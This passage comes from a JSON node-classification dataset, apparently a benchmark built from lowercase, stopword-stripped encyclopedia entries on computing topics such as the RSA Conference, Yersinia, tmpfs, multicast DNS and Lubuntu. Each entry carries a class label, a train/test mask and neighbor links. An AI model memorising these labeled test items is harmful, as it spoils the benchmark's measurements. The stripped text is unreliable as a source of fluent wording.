opportunity 2008 conference 17,000 attendees 375 participating security vendors 18 tracks 230 sessions 2010 rsa conference obama administration publicly revealed comprehensive national cybersecurity initiative cnci created 2008 formerly kept secret 2011 california-based security company hbgary withdrew speaking exhibiting rsa conference citing safety concerns company announced plans reveal identities members hacktivist group anonymous received retaliatory threats hacks 2014 8 speakers boycotted rsa conference sponsor rsa security accused adding backdoor products national security agency could monitor users rsa security technology boycott began f-secure chief technology officer mikko hyppönen wanted rsa security apologize whereas company statement allegations true noted rsa conference rsa security company loosely connected discussion year conference focused heavily leaks edward snowden nsa involvement american technology companies first rsa conference asia-pacific introduced 2013 followed inaugural united arab emirates conference two years later 2015 conference added clause exhibitor contracts effectively prohibiting booth babes requiring professional attire exhibitor floor policy implemented response feedback booth babes made conference feel unprofessional fortune magazine called widespread practice booth babes professional conferences outdated unwelcoming female attendees following year rsa conference focused fbi–apple encryption dispute regarding attempts government gain access iphones containing evidence criminal investigations 2017 conference estimated 40,000–43,000 attendees united states rsa conference international conference series security takes place united states europe asia/japan united arab emirates also provides internet safety education consumers children security scholar program security students operates award programs typically bestowed conferences example one award innovation sandbox contest involves ten startups present technology panel judges 2017 conference u.s. 15 keynotes 700 speakers 500 sessions 550 exhibitors analysis session keywords conference suggest early conferences focused cryptography commerce topical focus conferences transitioned cloud cybersecurity early 2000s conference theme practice began 1995 additionally typically one two security topics conference organizers pick focus year speaking positions rsa conference highly competitive thousands submissions hundred speaking positions rsa conference provides annual awards recognize outstanding people organizations following areas following awards winners announced opening keynote sessions conference april year recent winners include tim jenkin michael assante professor ran canetti professor rafail ostrovsky admiral michael rogers",
    "neighbors": [
      8320,
      5002,
      6282,
      2837,
      11542,
      537,
      7449,
      9246,
      8865,
      1573,
      3495,
      3112,
      6439,
      11561,
      3116,
      4016,
      2629,
      5575,
      6347,
      7887,
      5586,
      9688,
      5217,
      8807,
      2154,
      8176,
      1907,
      2678,
      1912,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7900,
    "label": 5,
    "text": "Digital_circuit_multiplication_equipment:digital circuit multiplication equipment digital circuit multiplication equipment dcme type voice compression equipment installed ends long-distance telecommunication link typically link via communications satellite submarine communications cable main characteristics dcme defined itu-t recommendation g.763 dcme consists time-assignment speech interpolation tasi voice interpolation stage form statistical multiplexor applied voiceband signals low rate encoding stage exploits correlation successive voiceband samples individual input channel reduce transmitted bitrate required pcm equivalent quality heavy loading conditions example large number channels show continuous activity due voiceband data group iii facsimile signals voice interpolation may able operate within satisfactory quality range discontinuous signals speech affected competitive clipping initial part activity combat dcme may incorporate dynamic load control range input channels dynamic load control form back busying telephone switch dcme functionality point view telephone switch attached local interface standardised itu-t recommendation q.50",
    "neighbors": [
      7108,
      3165
    ],
    "mask": "Test"
  },
  {
    "node_id": 7901,
    "label": 4,
    "text": "Yersinia_(computing):yersinia computing yersinia network security/hacking tool unix-like operating systems designed take advantage weakness different network protocols yersinia considered valuable widely used security tool 2017 yersinia still development latest stable version number 0.8.2 available github source code repository attacks following network protocols implemented yersinia rated 59 sectools.org top 125 network security tools",
    "neighbors": [
      418,
      841,
      8554,
      939,
      7983,
      2996,
      5045,
      5492,
      6904,
      5657,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 7902,
    "label": 2,
    "text": "Electric_Fence:electric fence electric fence efence memory debugger written bruce perens consists library programmers link code override c standard library memory management functions efence triggers program crash memory error occurs debugger used inspect code caused error electric fence intended find two common types programming bugs cases electric fence causes errant program abort immediately via segmentation fault normally two errors would cause heap corruption would manifest much later usually unrelated ways thus electric fence helps programmers find precise location memory programming errors electric fence allocates least two pages often 8kb every allocated buffer modes operation deallocate freed buffers thus electric fence vastly increases memory requirements programs debugged leads recommendation programmers apply electric fence smaller programs possible never leave electric fence linked production code electric fence free software licensed gnu general public license",
    "neighbors": [
      6568,
      814
    ],
    "mask": "None"
  },
  {
    "node_id": 7903,
    "label": 3,
    "text": "Barrett_Communications:barrett communications barrett communications specialist manufacturer supplier commercial high frequency hf tactical hf high frequency vhf communications equipment head office design manufacturing located perth western australia barrett communications founded 1976 company steadily grew began exporting first commercial hf radios 1987 range expanded include transceivers base portable mobile modems power supplies amplifiers antennas accessories may 2009 barrett communication acquired q-mac electronics increased barrett communications product range include vhf radio systems august 2011 barrett communications received certification joint interoperability test command jitc barrett 2050 hf mobile base station transceiver certification includes conformance mil-std-188-141b well automatic link establishment ale specifications mil-std-188-141b appendix 2012 barrett communications exports 150 countries global dealer network 65 countries company maintains quality assurance system covering design manufacturing approved iso 9001 2008 barrett communications also operates marketing office united kingdom barrett europe limited wholly owned subsidiary barrett communications located whiteley hampshire nvis communications/barrett consulting division north american systems integrator barrett communications usa canada barrett communications designs manufactures range hf communications equipment commercial tactical use range includes transceivers base portable mobile modems power supplies amplifiers antennas accessories barrett ’ range hf communications equipment ranges basic voice communication data email fax gps tracking barrett ’ prc-2090 tactical radio meets mil-std 180g fed-std 1045 mil-std 188-141b ale jitc certifiable as-nzs 4770:200 barrett communications designs manufactures range vhf communications equipment specifically tactical use range known barrett prc-2080 tactical vhf radio system includes vhf 30 88 mhz squad brigade base mobile transceivers rebroadcast units equipment provides digital voice encryption frequency hopping data positional awareness rebroadcast capability",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7904,
    "label": 9,
    "text": "MIT/GNU_Scheme:mit/gnu scheme mit/gnu scheme programming language dialect implementation language scheme type lisp produce native binary files x86 ia-32 x86-64 processor architecture supports standard r7rs mostly free open-source software released gnu general public license gpl first released developers massachusetts institute technology mit 1986 free software even free software foundation gnu gpl existed part gnu project features rich runtime software library powerful source code level debugger native code compiler built-in emacs-like editor named edwin books structure interpretation computer programs structure interpretation classical mechanics include software run mit/gnu scheme edwin built-in emacs-like editor comes mit/gnu scheme edwin normally displays codice_1 data buffer mode line mini-buffer starts emacs mode line gives information like name buffer whether buffer read-only modified unmodified",
    "neighbors": [
      10752,
      2050,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      3618,
      5154,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      5703,
      10822,
      1613,
      9299,
      10841,
      3674,
      3675,
      7267,
      2660,
      8293,
      2666,
      8304,
      5751,
      7805,
      9345,
      2180,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      5833,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      10464,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      8436,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      802,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      9579,
      1394,
      3446,
      10104,
      377,
      4992,
      11654,
      7562,
      4493,
      1939,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      5555,
      9148,
      10687,
      7616,
      5569,
      6594,
      4550,
      11218,
      8147,
      10712,
      2010,
      3034,
      3051,
      5611,
      5612,
      499,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 7905,
    "label": 4,
    "text": "Bare-metal_restore:bare-metal restore bare-metal restore technique field data recovery restoration backed data available form allows one restore computer system bare metal i.e without requirements previously installed software operating system typically backed data includes necessary operating system applications data components rebuild restore backed system entirely separate piece hardware configurations hardware receiving restore needs identical configuration hardware source backup although virtualization techniques careful planning enable bare-metal restore hardware configuration different original disk imaging applications enable bare-metal restores storing copies images entire contents hard disks networked external storage writing images physical disks disk image application include entire operating system bootable live cd network file server contains required application code create restore disk images dd utility linux boot cd used copy file systems disk images disk partitions effect bare-metal backup recovery disk images used input new partition type equal larger size alternatively variety virtualization technologies often represent accessible less efficient representation data original partition ibm vm/370 operating system provides command name ddr disk dump restore bit bit backup hard drive specified media typically tape many choices exist microsoft introduced new backup utility wbadmin windows server 2008 family operating system 2008 built-in support bare-metal recovery users software also recover system hyper-v virtual machine microsoft updated windows recovery environment features windows 8 family operating system set provide built-in support bare-metal recovery microsoft windows server 2012 r2 offers built-in bare-metal-recovery",
    "neighbors": [
      5504,
      2196,
      922,
      9762,
      6692,
      3366,
      7983,
      5041,
      9655,
      823,
      11065,
      4154,
      11581,
      3773,
      3800,
      6768,
      3323,
      6396,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 7906,
    "label": 8,
    "text": "TumbleDeck:tumbledeck tumbledeck unofficial open-source desktop client application tumblr first version includes simple functions posting text images videos links chats quotes audio added version 1.1 beta compatible windows operating systems developed .net framework tumbledeck programmed visual basic .net 2008 name came mixing tumblr tumble tweetdeck deck makes tumbledeck",
    "neighbors": [
      3573,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 7907,
    "label": 6,
    "text": "Tmpfs:tmpfs tmpfs temporary file storage paradigm implemented many unix-like operating systems intended appear mounted file system data stored volatile memory instead persistent storage device similar construction ram disk appears virtual disk drive hosts disk file system everything stored tmpfs temporary sense files directly created non-volatile storage hard drive although swap space used backing store case low memory situations reboot everything tmpfs lost memory used tmpfs grows shrinks accommodate files contains many unix distributions enable use tmpfs default /tmp branch file system shared memory observed df example linux distributions e.g debian ubuntu /tmp normal directory /dev/shm uses tmpfs several independent variants tmpfs concept one earliest developed sun microsystems sunos operating systems like bsds linux provided sunos 4 includes likely earliest implementation tmpfs first appeared sunos 4.0 late 1987 together new orthogonal address space management allowed object memory mapped solaris /tmp directory made tmpfs file system default starting solaris 2.1 released december 1992 output solaris codice_1 command show swap background storage tmpfs volume tmpfs supported linux kernel beginning version 2.4 linux tmpfs previously known shmfs based ramfs code used bootup also uses page cache unlike ramfs supports swapping less-used pages swap space well filesystem size inode limits prevent memory situations defaulting half physical ram half number ram pages respectively 4.2bsd introduced mfs memory-based file system implemented applying existing ffs disk filesystem virtual memory region tmpfs memory filesystem implemented using conventional in-memory data structures order improve performance mfs merged official netbsd source tree september 10 2005 available 4.0 later versions freebsd ported netbsd implementation available 7.0 later versions dragonfly bsd also ported netbsd implementation available 2.5.1 later versions openbsd ported netbsd tmpfs implementation well initially started pedro martelletto improved many others enabled builds december 17 2013 first release openbsd tmpfs included 5.5 openbsd 6.0 disabled tmpfs due lack maintenance",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      10272,
      9249,
      9762,
      5158,
      52,
      7225,
      11323,
      8772,
      1109,
      10851,
      4708,
      1637,
      9836,
      7789,
      8816,
      9333,
      6263,
      9335,
      9343,
      8837,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      1193,
      5293,
      7344,
      11444,
      2230,
      5816,
      1212,
      8380,
      3265,
      10436,
      10951,
      9420,
      5840,
      7378,
      3795,
      4819,
      8402,
      8404,
      7383,
      728,
      3802,
      8410,
      6365,
      739,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      1286,
      2314,
      8461,
      6416,
      10000,
      274,
      1810,
      5397,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      1361,
      850,
      5969,
      346,
      2395,
      2397,
      1891,
      10596,
      2407,
      10087,
      2415,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8115,
      11698,
      8631,
      1464,
      1978,
      9151,
      9665,
      8643,
      9671,
      1993,
      7126,
      4571,
      2015,
      8676,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7908,
    "label": 5,
    "text": "Multicast_DNS:multicast dns computer networking multicast dns mdns protocol resolves hostnames ip addresses within small networks include local name server zero-configuration service using essentially programming interfaces packet formats operating semantics unicast domain name system dns although stuart cheshire designed mdns stand-alone protocol work concert standard dns servers mdns protocol published uses ip multicast user datagram protocol udp packets implemented apple bonjour open source avahi software packages android contains mdns implementation mdns also implemented windows 10 initially limited discovering networked printers later becoming capable resolving hostnames well mdns work conjunction dns service discovery dns-sd companion zero-configuration technique specified separately rfc 6763 mdns client needs resolve hostname sends ip multicast query message asks host name identify target machine multicasts message includes ip address machines subnet use information update mdns caches host relinquish claim name sending response packet time live ttl equal zero default mdns exclusively resolves hostnames ending codice_1 top-level domain tld cause problems domain includes hosts implement mdns found via conventional unicast dns server resolving conflicts requires network-configuration changes violate zero-configuration goal mdns message multicast udp packet sent following locations payload structure based unicast dns packet format consisting two parts—the header data header identical found unicast dns sub-sections data part queries answers authoritative-nameservers additional records number records sub-section matches value corresponding *count field header wire format records query section slightly modified unicast dns adding one single-bit field unicast dns qname field consists series length/value sub-fields called labels label represents one dot-separated substrings fully qualified domain name fqdn list terminated single null-byte representing root dns unicast-response field used minimize unnecessary broadcasts network bit set responders send directed-unicast response directly inquiring node rather broadcasting response entire network qclass field identical found unicast dns records answers authoritative-nameservers additional records sections format collectively known resource records rr resource records mdns also slightly modified general format unicast dns cache-flush bit used instruct neighbor-nodes record overwrite rather appended onto existing cached entries rrname rrtype formats rdata fields found unicast dns however dns service discovery dns-sd common use-case mdns specifies slight modifications formats notably txt records trying codice_2 codice_3 host would cause mdns client computer multicast following udp packet appletv.local host would respond multicasting mdns response packet example header non-zero fields codice_4 word 84 00 codice_5 word 00 01 codice_6 word 00 02 data begin fqdn hex 07 61 70 70 6c 65 74 76 05 6c 6f 63 61 6c 00 appletv.local followed host dns information",
    "neighbors": [
      8386,
      1411,
      2887,
      4457,
      3018,
      238,
      8238,
      11246,
      6993,
      11250,
      7411,
      5653,
      11413,
      5469,
      5470,
      11647
    ],
    "mask": "Train"
  },
  {
    "node_id": 7909,
    "label": 0,
    "text": "Optical_braille_recognition:optical braille recognition optical braille recognition act capturing processing images braille characters natural language characters used convert braille documents people read text preservation reproduction documents 1984 group researchers delft university technology designed braille reading tablet reading head photosensitive cells moved along set rulers capture braille text line-by-line 1988 group french researchers lille university science technology developed algorithm called lectobraille converted braille documents plain text system photographed braille text low-resolution ccd camera used spatial filtering techniques median filtering erosion dilation extract braille braille characters converted natural language using adaptive recognition lectobraille technique error rate 1 took average processing time seven seconds per line 1993 group researchers katholieke universiteit leuven developed system recognize braille scanned commercially available scanner system however unable handle deformities braille grid well-formed braille documents required 1999 group hong kong polytechnic university implemented optical braille recognition technique using edge detection translate braille english chinese text 2001 murray dais created handheld recognition system scanned small sections document small area scanned grid deformation less issue simpler efficient algorithm employed 2003 morgavi morando designed system recognize braille characters using artificial neural networks system noted ability handle image degradation successfully approaches optical braille recognition used digitize reproduce texts produced non-computerized systems braille typewriters digitizing braille texts also helps reduce storage space braille texts take much space natural language counterparts optical braille recognition also useful people read braille need access content braille documents many challenges successfully processing braille text arise nature braille documents braille generally printed solid-color paper ink produce contrast raised characters background paper however imperfections page appear scan image page many documents printed inter-point meaning double-sided depressions braille one side appear interlaid protruding braille side optical braille recognition techniques attempt use oblique lighting camera reveal shadows depressions protrusions braille others make use commercially available document scanners",
    "neighbors": [
      5857
    ],
    "mask": "None"
  },
  {
    "node_id": 7910,
    "label": 0,
    "text": "Semantic_folding:semantic folding semantic folding theory describes procedure encoding semantics natural language text semantically grounded binary representation approach provides framework modelling language data processed neocortex semantic folding theory draws inspiration douglas r. hofstadter analogy core cognition suggests brain makes sense world identifying applying analogies theory hypothesises semantic data must therefore introduced neocortex form allow application similarity measure offers solution sparse binary vector employing two-dimensional topographic semantic space distributional reference frame theory builds computational theory human cortex known hierarchical temporal memory htm positions complementary theory representation language semantics particular strength claimed approach resulting binary representation enables complex semantic operations performed simply efficiently basic computational level analogous structure neocortex semantic folding theory posits implementation semantic space two-dimensional grid grid populated context-vectors way place similar context-vectors closer instance using competitive learning principles vector space model presented theory equivalence well known word space model described information retrieval literature given semantic space implemented described word-vector obtained given word employing following algorithm position x semantic map x represents cartesian coordinates result process word-vector containing contexts word appears therefore representative semantics word semantic space seen resulting word-vector also sparse distributed representation sdr format schütze 1993 sahlgreen 2006 properties word-sdrs particular interest respect computational semantics semantic spaces natural language domain aim create representations natural language capable capturing meaning original motivation semantic spaces stems two core challenges natural language vocabulary mismatch fact meaning expressed many ways ambiguity natural language fact term several meanings application semantic spaces natural language processing nlp aims overcoming limitations rule-based model-based approaches operating keyword level main drawback approaches brittleness large manual effort required create either rule-based nlp systems training corpora model learning rule-based machine learning-based models fixed keyword level break vocabulary differs defined rules training material used statistical models research semantic spaces dates back 20 years 1996 two papers published raised lot attention around general idea creating semantic spaces latent semantic analysis microsoft hyperspace analogue language university california however adoption limited large computational effort required construct use semantic spaces breakthrough regard accuracy modelling associative relations words e.g spider-web lighter-cigarette opposed synonymous relations whale-dolphin astronaut-driver achieved explicit semantic analysis esa 2007 esa novel non-machine learning based approach represented words form vectors 100,000 dimensions dimension represents article wikipedia however practical applications approach limited due large number required dimensions vectors recently advances neural networking techniques combination new approaches tensors led host new recent developments word2vec google glove stanford university semantic folding represents novel biologically inspired approach semantic spaces word represented sparse binary vector 16,000 dimensions semantic fingerprint 2d semantic map semantic universe sparse binary representation advantageous terms computational efficiency allow storage large numbers possible patterns topological distribution two-dimensional grid outlined lends bitmap type visualization semantics word text active semantic feature displayed e.g pixel seen images shown representation allows direct visual comparison semantics two linguistic items image 1 clearly demonstrates two disparate terms dog car expected obviously different semantics image 2 shows one meaning contexts jaguar jaguar car overlaps meaning porsche indicating partial similarity meaning contexts jaguar e.g jaguar animal clearly different non-overlapping contexts note also visualization semantic similarity using semantic folding bears strong resemblance fmri images produced research study conducted a.g. huth et al. claimed words grouped brain meaning",
    "neighbors": [
      3288,
      7780,
      11206,
      9935
    ],
    "mask": "Test"
  },
  {
    "node_id": 7911,
    "label": 3,
    "text": "Scalar_processor:scalar processor scalar processors represent class computer processors scalar processor processes one data item time typical data items integers floating point numbers scalar processor classified sisd processor single instructions single data flynn taxonomy contrast vector processor single instruction operates simultaneously multiple data items referred simd difference analogous difference scalar vector arithmetic superscalar processor hand executes one instruction clock cycle simultaneously dispatching multiple instructions redundant functional units processor functional unit separate cpu core execution resource within single cpu arithmetic logic unit bit shifter multiplier",
    "neighbors": [
      7173,
      8711,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      6247,
      6252,
      8815,
      5237,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      5386,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      10548,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      3431,
      10603,
      11630,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      938,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      6084,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 7912,
    "label": 2,
    "text": "Flashback_(1992_video_game):flashback 1992 video game flashback released flashback quest identity united states 1992 science fiction cinematic platform game developed delphine software france published u.s. gold united states europe sunsoft japan game directed written/designed partially programmed paul cuisset previously created adventure game future wars flashback initially released amiga 1992 although originally created mega drive/genesis ported ms-dos acorn archimedes super nes 1993 time sega mega drive/genesis version also released cd-rom versions flashback sega cd 3do cd-i ms-dos apple macintosh fm towns released 1994 1995 together cartridge version atari jaguar 1995 2017 game released worldwide sega dreamcast featuring graphic assets cutscenes taken ms-dos version music amiga version updated port nintendo switch titled flashback remastered edition released june 7 2018 north america europe australia flashback remastered edition ported playstation 4 released november 20 2018 north america europe australia originally advertised cd-rom game cartridge game features fully hand-drawn backdrops animation rotoscoped giving movements unusual fluidity similar earlier prince persia capture technique flashback invented independently prince persia used complicated method first tracing video images onto transparencies game commercial critical success listed guinness world records best-selling french game time followed sequel titled fade black 1995 2013 flashback remake vectorcell released pc consoles cinematic platformer flashback features gameplay similar 1989 prince persia delphine another world released 1991 level spans large number non-scrolling screens nearly feature multiple levels altitude – requiring player character conrad jump grab onto ledges climb use elevators drop onto lower levels conrad exhibits realistic human running speed jumping ability well realistic weakness – die falls great height conrad also carries pistol unlimited ammunition force shield absorbs certain number shots needing recharging acting conrad health many attacks survive dying portable force field unlimited use act temporary barrier block enemies shots conrad progresses game seven levels increasingly presented spatial puzzles requiring player discover guide toward destination late game conrad receives teleportation device able progress throwing device teleporting otherwise unreachable areas year 2140 amnesiac conrad b. hart chased mutants crash-lands hover bike jungle titan finds holocube fell pocket contains recorded message telling meet friend ian new washington makes way jungle purchases anti-gravity belt order enter new washington via chasm finds ian attacked police kills ian uses regenerator restore conrad memories end year thesis built glasses measure molecular density inadvertently discovered shapeshifting aliens called morphs distinguished high density mixed human population morphs realized investigating targeted anticipating memory erasure recorded holocube sent copy memory ian conrad determined return earth ian tells way afford ticket earth win one death tower game show contestants fight death false papers required pass pay forged papers conrad takes series dangerous jobs city finds continually targeted police presumably misled morph infiltrators conrad wins death tower travels earth false papers get past checkpoint morphs soon realize conrad pursued cops takes taxi paradise club conceals morphs hideout spies three morphs ceiling vent discuss plan conquer earth within hours conrad falls vent taken prison cell soon morphs enter cell kill conrad runs past picks discarded alien gun exploring facility discovers teleporter uses transport morphs home planet finds human prisoner named phillip howard clark opens prison morph appears executes phillip dying phillip gives conrad atomic charge phillip diary reveals planned destroy master brain controls aliens located planet core auxiliary brain must destroyed open communication pathways master brain conrad destroys auxiliary brain finds master brain pathway arrives certain spot hears phillip voice telling atomic charge placed loose platform throws switch awakening brain cause tremor drops charge towards core conrad escapes hangar takes morph spacecraft planet atmosphere detonates navigate home due morphs galaxy human star charts instead puts suspended animation ship drifts space leading events fade black pc version extended introductory sequence minor cut scenes amiga version picking items amiga version user see scenes enabling although seconds delay every time animations load playing game entirely hard drive amiga version also option zoom action whenever conrad opens fire due criticism look removed versions although option play game zoomed remained pc version message conrad writes ending also different release game originally released 3.5 floppy disk ms-dos re-release cd-rom sega cd later adapted pc cd-rom 3do cd-i featured redone pre-rendered cinematic fmvs voice acting sound effects sega cd version also voice work gameplay cd tracks level carried cd-rom conversions jaguar port title screen versions music different cutscenes original releases issue 118 retro gamer paul cussiet told magazine best version mega drive version game created platform north america genesis super nes sega cd versions featured marvel comic book within manual order explain initial story pal releases mega drive super nes versions mega cd version pal region omitted comic instead featured textual prologue super nes port featured minor censorship due nintendo content guidelines time changes included new washington bar becoming cafe death tower renamed cyber tower enemy mutants natural skin colors versions recolored green two-track cd soundtrack released featuring music inspired game directly flashback sold roughly 750,000 copies 1995 computer gaming world approved flashback superbly rotoscoped graphics fluid movement sound card audio criticizing awkward interface use save points magazine concluded excellent game truly creates sense reality electronic gaming monthly praised snes version improved graphics music genesis version remarked flashback slow-paced times retains player interest compelling plot involving puzzles megatech magazine conceded although five big levels finishing game take long nintendo power praised graphics story animation calling almost cinematic noting play control takes getting used electronic gaming monthly commented sega cd version virtually identical genesis version flashback still essential purchase already different version gamepro contrast argued reworked cutscenes look awesome even gamers 've already completed game another platform want play see new cd footage also praised addition cd-quality soundtrack voices reviewer next generation acknowledged sega cd version makes considerable improvements argued standard cartridge-to-sega cd enhancements impact gameplay however lauded flashback graphics animation fiendishly clever puzzles said though game superficially resembles another world heart alien class easily surpasses reviewing jaguar version gamepro noted merely straight port enhancements take advantage hardware game less enjoyable first released game consoles year reviewing macintosh version next generation critic applauded game animation story sequences plot level design longevity next generation reviewed 3do version game stated title still great game 've looking couple years one last note 3do controller n't interfere much game demanding control scheme flashback listed guinness world records best-selling french game time mega drive version became bestseller 1994 mega placed game number eight list top mega drive games time february 2011 wirtualna polska ranked 17th best amiga game polish edition chip ranked tenth best amiga game 2004 readers retro gamer voted flashback 65th top retro game 1994 pc gamer uk named flashback 17th best computer game time editors wrote flashback proves comes producing original stylish challenging games adept french entertainment weekly gave game b wrote finally limping onto sega cd almost two years genesis debut futuristic role-playing thriller still worth checking — n't game since matched unique almost hypnotic dynamic languorous stretches exploration problem-solving punctuated bursts realistic gunplay keep mind atmospheric soundtrack cinematic interludes original genesis flashback advertised cd game cartridge — sega cd flashback version many access delays improves marginally original 'll wonder format complimented sequel titled fade black produced delphine software international 1995 pc playstation 3d game third game series flashback legends development delphine software international adeline software international planned released 2003 cancelled company went bankrupt ceased operations end 2002 early 2013 game titled flashback origins rumoured development french website gameblog stating €300,000 government funding granted cuisset vectorcell 2011 april 11 2013 remake flashback announced reveal trailer reminiscence game engine recreation created gregory montoir cyx engine available amiga os4 dreamcast gp2x iphone linux microsoft windows mac os x maemo morphos nintendo ds wii palm os playstation 2 playstation portable sega saturn windows ce also one xbox 360 magicseb port symbian maemo 5 ronen k available",
    "neighbors": [
      576,
      321,
      9732,
      10316,
      6797,
      9166,
      10862,
      823,
      921
    ],
    "mask": "Test"
  },
  {
    "node_id": 7913,
    "label": 2,
    "text": "Lubuntu:lubuntu lubuntu lightweight linux distribution based ubuntu using lxqt desktop environment place ubuntu gnome desktop lubuntu originally touted lighter less resource hungry energy-efficient aims functional yet modular distribution focused getting way letting users use computer lubuntu originally used lxde desktop moved lxqt desktop release lubuntu 18.10 october 2018 name lubuntu portmanteau lxqt ubuntu lxqt name derives merger lxde razor-qt projects word ubuntu means humanity towards others zulu xhosa languages lubuntu received official recognition formal member ubuntu family 11 may 2011 commencing lubuntu 11.10 released 13 october 2011 lxde desktop first made available ubuntu october 2008 release ubuntu 8.10 intrepid ibex early versions lubuntu including 8.10 9.04 9.10 available separate iso image downloads could installed ubuntu separate lubuntu-desktop packages ubuntu repositories lxde also retroactively installed earlier ubuntu versions february 2009 mark shuttleworth invited lxde project become self-maintained project within ubuntu community aim leading dedicated new official ubuntu derivative called lubuntu march 2009 lubuntu project started launchpad mario behling including early project logo project also established official ubuntu wiki project page includes listings applications packages components august 2009 first test iso released live cd installation option initial testing september 2009 linux magazine reviewer christopher smart showed lubuntu ram usage half xubuntu ubuntu normal installation desktop use two thirds less live cd use 2014 project announced gtk+-based lxde qt-based razor-qt would merging new qt-based lxqt desktop lubuntu would consequently moving lxqt transition complete release lubuntu 18.10 october 2018 first regular release employ lxqt desktop lenny became lubuntu mascot 2014 2018 transition becoming lxqt-based aim lubuntu re-thought development team previously intended users older computers typically ten years old newer introduction windows vista pcs older computers gained faster processors much ram 2018 ten-year-old computers remained much capable case five years earlier result lubuntu development team simon quigley decided change focus emphasize well-documented distribution based lxqt give users functional yet modular experience lightweight default available language developers also decided stop recommending minimum system requirements 18.04 lts release developer simon quigley announced august 2018 lubuntu 20.10 switch wayland display server protocol default january 2019 developers formed lubuntu council new body formalize previous organization written constitution 30 december 2009 first alpha 1 preview version iso lubuntu 10.04 lucid lynx made available testing alpha 2 following 24 january 2010 first beta released 20 march 2010 stable version lubuntu 10.04 released 2 may 2010 four days behind main ubuntu release date 28 april 2010 lubuntu 10.04 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages lubuntu 10.04 intended long-term support lts release unlike ubuntu 10.04 lucid lynx going supported 18 months however since infrastructure ubuntu 10.10 maverick meerkat thus lubuntu 10.10 dropped support i586 processors including via c3 amd k6 amd geode/national semiconductor cpus release lubuntu 10.10 prompted community extend support april 2013 lubuntu 10.04 long term support version reviewing lubuntu 10.04 alpha 1 january 2010 joey sneddon omg ubuntu wrote many preconceptions regarding lxde/lubuntu found presently surprised pleasant look pleasant use although doubt would switch gnome lxde give excellent performance would benefit writing final 10.10 release 10 october 2010 sneddon termed nimble easy-to-use desktop writing lubuntu 10.04 may 2010 damien oh make tech easier said looking lightweight alternative install old pc netbook lubuntu great choice ’ get eye candy special graphical effects get fast speed low cost ’ time put old pc back work also reviewing lubuntu 10.04 may 2010 robin catling full circle magazine said first thing impresses running lubuntu modest compaq evo laptop pentium-m 512 mb ram small memory footprint ... beats karmic gnome xubuntu xfce mile evo used take 60 seconds-plus boot desktop lxde takes exactly 30 yet 're restricted gtk2 applications well supported synaptic hooks ubuntu repositories package management pull open office replace default abi-word without crippling machine catling note file manager pcmanfm file manager needs little maturity compete thunar competent robust application n't hog resources like nautilus dolphin june 2010 jim lynch reviewed lubuntu 10.04 saying one thing ’ notice using lubuntu desktop ’ fast fast even underpowered machine lubuntu perform well ’ one best things distro leaves behind bloated eye candy sometimes bog gnome kde ... ’ run noticeable problems lubuntu fast stable ’ see noticeable bugs problems hate happens since ’ much interesting readers run one nasty problem another hopefully next version lubuntu chock full horrendous problems bugs kidding september 2010 lead developer julien lavergne announced lubuntu project granted official status derivative ubuntu part ubuntu 10.04 release cycle work would continue goal ubuntu 10.10 lavergne explained reasons still resource problem canonical /ubuntu infrastructure resolved cycle also writing real process integrate new member ubuntu family ’ still finished lubuntu 10.10 released schedule 10 october 2010 day ubuntu 10.10 maverick meerkat built underlying infrastructure ubuntu 10.10 developer julien lavergne said lubuntu actually part ubuntu family build current ubuntu infrastructure release considered « stable beta » result could final stable release included ubuntu family version 10.10 introduced new artwork distribution including new panel menu backgrounds new openbox theme new lubuntu menu logo splash images desktop 